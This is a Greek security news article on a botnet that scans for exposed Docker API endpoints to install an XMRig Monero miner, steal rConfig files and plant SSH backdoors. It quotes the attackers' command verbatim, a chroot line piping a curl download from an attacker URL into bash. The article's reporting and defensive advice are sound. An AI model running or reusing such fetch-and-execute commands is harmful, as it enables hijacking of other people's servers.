Παρασκευή, 10 Απριλίου, 07:22
Αρχική security Hackers εγκαθιστούν cryprominer σε Docker πλατφόρμες με εκτεθειμένα API endpoints

Hackers εγκαθιστούν cryprominer σε Docker πλατφόρμες με εκτεθειμένα API endpoints

Docker πλατφόρμεςΕρευνητές ανακάλυψαν ότι μια hacking ομάδα σαρώνει μαζικά το διαδίκτυο αναζητώντας Docker πλατφόρμες που έχουν API endpoints εκτεθειμένα στο διαδίκτυο.

Οι hackers κάνουν τις σαρώσεις με σκοπό να αναπτύξουν ένα cryptominer στις εκτεθειμένες Docker πλατφόρμες και να κλέψουν χρήματα.

Επαγγελματίες πίσω από την hacking εκστρατεία

Σύμφωνα με τους ερευνητές, η εκστρατεία μαζικής σάρωσης του διαδικτύου ξεκίνησε το Σαββατοκύριακο στις 24 Νοεμβρίου. Αμέσως τράβηξε την προσοχή των ερευνητών λόγω της τεράστιας έκτασής της.

Ο Troy Mursch, επικεφαλής ερευνητής και συνιδρυτής της Bad Packets LLC, είπε ότι η εκμετάλλευση εκτεθειμένων Docker πλατφορμών δεν είναι κάτι καινούργιο. Συμβαίνει συχνά.

“Αυτό που ξεχώρισε αυτή την εκστρατεία ήταν το μεγάλο εύρος της σάρωσης. Αυτό από μόνο του απαιτούσε περαιτέρω έρευνα για να μάθουμε πού στοχεύει αυτό το botnet“, ανέφερε.

- Advertisement -

Τι πληροφορίες έχουμε μέχρι τώρα;

Προς το παρόν, οι ερευνητές έχουν ανακαλύψει ότι η hacking ομάδα, που είναι υπεύθυνη γι’ αυτή την εκστρατεία, έχει ήδη σαρώσει περισσότερα από 59.000 IP δίκτυα (netblocks) αναζητώντας εκτεθειμένες Docker πλατφόρμες.

Αν εντοπιστεί κάποιο ευάλωτο μηχάνημα, οι hackers χρησιμοποιούν το API endpoint για να ξεκινήσουν ένα Alpine Linux OS container, όπου εκτελούν την ακόλουθη εντολή:

chroot / mnt / bin / sh -c ‘curl-sL4 http://ix.io/1XQa | bash;

Αυτή η εντολή κατεβάζει και εκτελεί ένα Bash script από τον server των εισβολέων. Αυτό το script εγκαθιστά, στη συνέχεια, ένα crypotminer XMRRig. Σύμφωνα με τον Mursch, κατά τη διάρκεια του Σαββατοκύριακου, οι hackers έκλεψαν 14,82 νομίσματα Monero (XMR), αξίας μόλις 740 δολαρίων.

Κάτι άλλο που παρατήρησαν οι ερευνητές, είναι ότι το κακόβουλο λογισμικό που εγκαθιστούν οι hackers, διαθέτει ένα μέτρο αυτοάμυνας.

“Μία μοναδική αλλά ενδιαφέρουσα λειτουργία της εκστρατείας αυτής είναι ότι κάνει απεγκατάσταση γνωστών προγραμμάτων παρακολούθησης και «σκοτώνει» διάφορες διαδικασίες, μέσω ενός script που κατεβαίνει από το http: // ix [.] Io / 1XQh,”, είπε ο Mursch.

Αυτό το script απενεργοποιεί τα προϊόντα ασφαλείας, αλλά και διαδικασίες, που σχετίζονται με αντίπαλα cryptomining botnet, όπως το DDG.

Επιπλέον, ο Mursch ανακάλυψε ότι το κακόβουλο script έχει μια άλλη λειτουργία, η οποία σαρώνει τον μολυσμένο υπολογιστή αναζητώντας rConfig configuration files. Το script κρυπτογραφεί και κλέβει τα αρχεία και τα στέλνει στον command and control server των επιτιθέμενων.

Ο Craig H. Rowland, ιδρυτής της Sandfly Security, παρατήρησε, ακόμα, ότι οι hackers δημιουργούν backdoor accounts στα hacked containers και αφήνουν πίσω SSH κλειδιά ώστε να έχουν ευκολότερη πρόσβαση και να μπορούν να ελέγξουν απομακρυσμένα όλα τα μολυσμένα bots.

Προς το παρόν, ο Mursch προτείνει σε όλους τους χρήστες και τις εταιρείες, που τρέχουν Docker πλατφόρμες, να ελέγξουν αν υπάρχουν εκτεθειμένα API endpoints στο διαδίκτυο και να δράσουν άμεσα.

Absenta Mia
Absenta Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greater achievement

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here

LIVE NEWS

loopfs: Θα μπορούσε να είναι το νέο σύστημα αρχείων του Linux;

Το Linux υποστηρίζει αρκετά συστήματα αρχείων, όπως EXT4, F2FS, Btrfs και XFS. Αυτά τα συστήματα επαρκούν όταν...

Έρευνα: Οι έφηβοι προτιμούν τα iPhones από τα κινητά Samsung

Σύμφωνα με έρευνα που διεξάγεται κάθε έξι μήνες με στόχο να καταγράψει τις συνήθειες των εφήβων, oι νέοι δεν επιλέγουν κινητά Samsung....

Bill Gates: Τα σχολεία ανοίγουν το φθινόπωρο και η οικονομία καταστρέφεται

Ο Bill Gates πιστεύει ότι τα σχολεία θα μπορέσουν να ανοίξουν το φθινόπωρο, δήλωσε σε συνέντευξή του στο Becky Quick στο CNBC.

Μουσείο Τηλεπικοινωνιών Ομίλου ΟΤΕ: Εκπαιδευτικά προγράμματα και ψυχαγωγικές δράσεις από το σπίτι για παιδιά 4-12 ετών και όλη την οικογένεια

Εκπαιδευτικά προγράμματα και ψυχαγωγικές δράσεις για παιδιά και οικογένειες, στις οποίες μπορούν συμμετάσχουν από το σπίτι, προσφέρει το Μουσείο Τηλεπικοινωνιών του Ομίλου...

Microsoft: Κυκλοφόρησε τις ενημερώσεις του Απριλίου 2020 για το Office

Η Microsoft κυκλοφόρησε τις non-security ενημερώσεις του Απριλίου 2020 για το Microsoft Office, οι οποίες περιλαμβάνουν διορθώσεις για σφάλματα καθώς και βελτιώσεις...

To νέο Cheetah mode της Τesla προσφέρει κορυφαίες επιδόσεις

Το νέο Cheetah mode στο μοντέλο Tesla S ωθεί το ηλεκτρικό αυτοκίνητο από 0 στα 100 χλμ / ώρα γρηγορότερα από ότι...

Tails 4.5: Κυκλοφόρησε η νέα, πιο ασφαλής έκδοση!

Tails 4.5: Κυκλοφόρησε η νέα, πιο ασφαλής έκδοση- Το Tails, είναι ένα live λειτουργικό σύστημα βασισμένο στο...

Windows 10 λειτουργία βοηθά στη διαγραφή άχρηστων αρχείων και apps

Τα Windows 10 θα διευκολύνουν τη διαγραφή άχρηστων αρχείων και apps, παρουσιάζοντάς τα μαζεμένα σε μια λίστα.

Cloudflare: Σταματά να χρησιμοποιεί το reCAPTCHA της Google!

Η Cloudflare ανακοίνωσε ότι θα σταματήσει να χρησιμοποιεί το reCAPTCHA της Google και θα μεταβεί σε έναν νέο πάροχο εντοπισμού bot που...

Το Google Stadia Pro προσφέρεται δωρεάν για δύο μήνες! Ώρα για video games!

Η κατάσταση που βιώνουμε το τελευταίο διάστημα λόγω κορωνοϊού, είναι μια από τις πιο δύσκολες καταστάσεις των...